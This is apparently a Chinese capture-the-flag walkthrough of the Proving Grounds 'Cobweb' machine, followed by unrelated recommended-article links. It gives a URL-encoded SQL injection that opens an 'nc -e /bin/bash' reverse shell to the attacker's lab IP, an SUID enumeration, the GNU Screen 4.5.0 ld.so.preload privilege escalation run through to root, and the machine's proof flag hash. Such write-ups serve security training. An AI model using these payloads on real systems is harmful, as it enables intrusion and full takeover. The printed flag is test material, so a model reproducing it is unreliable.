源码泄露

可以直接看到源码存在sql注入

反弹shellpayload

http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);echo%2011122;'%20order%20by%201%20desc%20%20--%20

查看具有suid的命令

发现screen 命令存在漏洞GNU Screen 4.5.0 - Local Privilege Escalation

点击查看代码 
sh-4.4# find / -perm -u=s -type f 2>/dev/null

/var/tmp/rootshell

/usr/bin/fusermount

/usr/bin/chage

/usr/bin/gpasswd

/usr/bin/newgrp

/usr/bin/su

/usr/bin/mount

/usr/bin/umount

/usr/bin/pkexec

/usr/bin/crontab

/usr/bin/passwd

/usr/bin/chfn

/usr/bin/chsh

/usr/bin/at

/usr/bin/sudo

/usr/bin/fusermount3

/usr/bin/screen-4.5.0

/usr/sbin/grub2-set-bootflag

/usr/sbin/pam_timestamp_check

/usr/sbin/unix_chkpwd

/usr/sbin/userhelper

/usr/lib/polkit-1/polkit-agent-helper-1

/usr/libexec/dbus-1/dbus-daemon-launch-helper

/usr/libexec/cockpit-session

/usr/libexec/sssd/krb5_child

/usr/libexec/sssd/ldap_child

/usr/libexec/sssd/proxy_child

/usr/libexec/sssd/selinux_child

按照https://www.exploit-db.com/exploits/41154 里面的方法自己在本地写好
libhax.so 和 rootshell 其中编译rootshell的时候要加上 -static 不然运行不了
同时执行的目录也要修改为/var/tmp
因为在/var/tmp 里面执行不了suid命令

成功提权 
bash-4.4$ cd /var/tmp

bash-4.4$ ls

libhax.so  rootshell

bash-4.4$ cd /etc

bash-4.4$ unmask 000

bash: unmask: command not found

bash-4.4$ umask 000 # because

bash-4.4$ screen -D -m -L ld.so.preload echo -ne  "\x0a/var/tmp/libhax.so"

bash-4.4$ screen -ls

' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.

[+] done!

No Sockets found in /tmp/screens/S-apache.

bash-4.4$ cd /var/tmp

bash-4.4$ ls

libhax.so  rootshell

bash-4.4$ ls -al

total 788

drwxrwxrwt   2 root   root       40 Nov  7 07:16 .

drwxr-xr-x. 22 root   root     4096 Aug 27  2021 ..

-rwxrwxrwx   1 apache apache  15696 Nov  7 06:57 libhax.so

-rwsr-xr-x   1 root   root   785800 Nov  7 07:13 rootshell

bash-4.4$ ./rootshell

sh-4.4# whoami

root

sh-4.4# cd /root

sh-4.4# ls

proof.txt

sh-4.4# cat proof.txt

392388689a0ceba499668648185647f6

Cobweb Intermediate pg walkthrough的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  3. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  4. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

  5. #pg学习#postgresql的安装

    1.按照官网给的步骤编译安装(Mac安装是比较容易的,相比Liunx) cd /Users/renlipeng/Desktop/postgresql-9.5.1 ./configure --prefi ...

  6. PG 函数的易变性(Function Volatility Categories)

    此概念的接触是在做分区表的时候碰到的,分区表按时间字段分区,在查询时当where条件中时间为now()或者current_time()等时是无法查询的,即使进行格式转换也不行,只有是时间格式如‘201 ...

  7. c++错误——intermediate.manifest : general error c1010070很傻的错

    .\Debug\sadf.exe.intermediate.manifest : general error c1010070: Failed to load and parse the manife ...

  8. mysql 序列与pg序列的比较

    mysql序列(这里只谈innodb引擎): 在使用mysql的AUTO_INCREMENT时,使用AUTO_INCREMENT的字段必须建有索引,也可以为索引的一部分.当没有索引时会报错:      ...

  9. 使用zfs进行pg的pitr恢复测试

    前段时间做了一下zfs做pg的增量恢复测试,mark一下. 服务器信息: 主机:192.168.173.43 备机:192.168.173.41 主备使用流复制搭建,在备机上面进行了zfs快照备份. ...

  10. PG CREATEINDEX CONCURRENTLY

    PG CREATEINDEX CONCURRENTLY [TOC] 官方说法 根据9.1的文档 Creating an index can interfere with regular operati ...

随机推荐

  1. .NET 各版本贡献者列表

    在微信群里看到有同学对.NET 9的贡献者数量有质疑,.NET 这样的一个全场景的应用开发平台,他的生态是很庞大的,自然一起参与开源贡献的开发者也是很大的,但是很多人都不知道一直有这么一个地址是统计了 ...

  2. SPI接口,如何对W25Q64进行读写操作?深度解析

    ​ 一.SPI概述 SPI(SerialPeripheralInterface)是一种同步串行通信协议,广泛应用于微控制器和外围设备之间的数据传输.它由摩托罗拉公司开发,具有全双工通信能力,即可以同时 ...

  3. 国产数据库oceanBbase,达梦,金仓与mysql数据库的性能对比 四、python读mysql写入达梦数据库

    一.说明 安装达梦的驱动 pip install dmPython==2.5.5 参数接收那里,其他数据库都是用%,达梦要用? 二.源码 #coding=utf-8 import pymysql im ...

  4. django性能分析工具之silk

    在开发过程中,有很多时候需要了解程序性能瓶颈,比如程序执行时间.网络耗时.数据库连接时间等:那接下来,django silk就派上用场了! 安装 https://github.com/jazzband ...

  5. Mybatis【10】-- Mybatis属性名和查询字段名不同怎么做?

    很多时候我们有这样的需求,数据库的字段名与实体类的属性名不一致,这个时候我们需要怎么做呢?有两种解决方案,第一种:直接在查询的时候使用别名,将别名设置成与实体类的属性名一致.第二种:使用resultT ...

  6. Teable 团队 Sealos 最佳实践,创业公司的完美选择

    大家好,我是开源多维表格项目 Teable 的创始人陈加贝. 作为飞书多维表格的最早期负责人,我参与并见证了这个产品从 0 到 1 的全过程.这段经历也让我深入理解了企业在数据协作方面的真实需求. 以 ...

  7. cv2, pil.image, plt.image 读图的差异

    人是习惯性动物,当我们第一次用opencv时,肯定会觉得opencv的imread()方式很奇怪,做图像出来天天说图像是RGB图RGB图,可opencv读出来的图,却是BGR的顺序.是不是很奇怪,还不 ...

  8. 使用TOPIAM 轻松搞定「Wiki.js」单点登录

    本文将介绍 TOPIAM 与 Wiki 集成步骤详细指南. 应用简介 Wiki.js 是一款高度可定制且现代化的开源 Wiki 系统,专为团队知识管理和文档协作设计,具有强大的扩展性和跨平台支持能力. ...

  9. Centos更改SSH端口的方法

    1,vi sshd vi /etc/ssh/sshd_config 2,添加PORT #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress ...

  10. 【实训总结报告】大二下学期期末Java EE实训报告

    站点在微信公众号(萌狼蓝天)回复便可以访问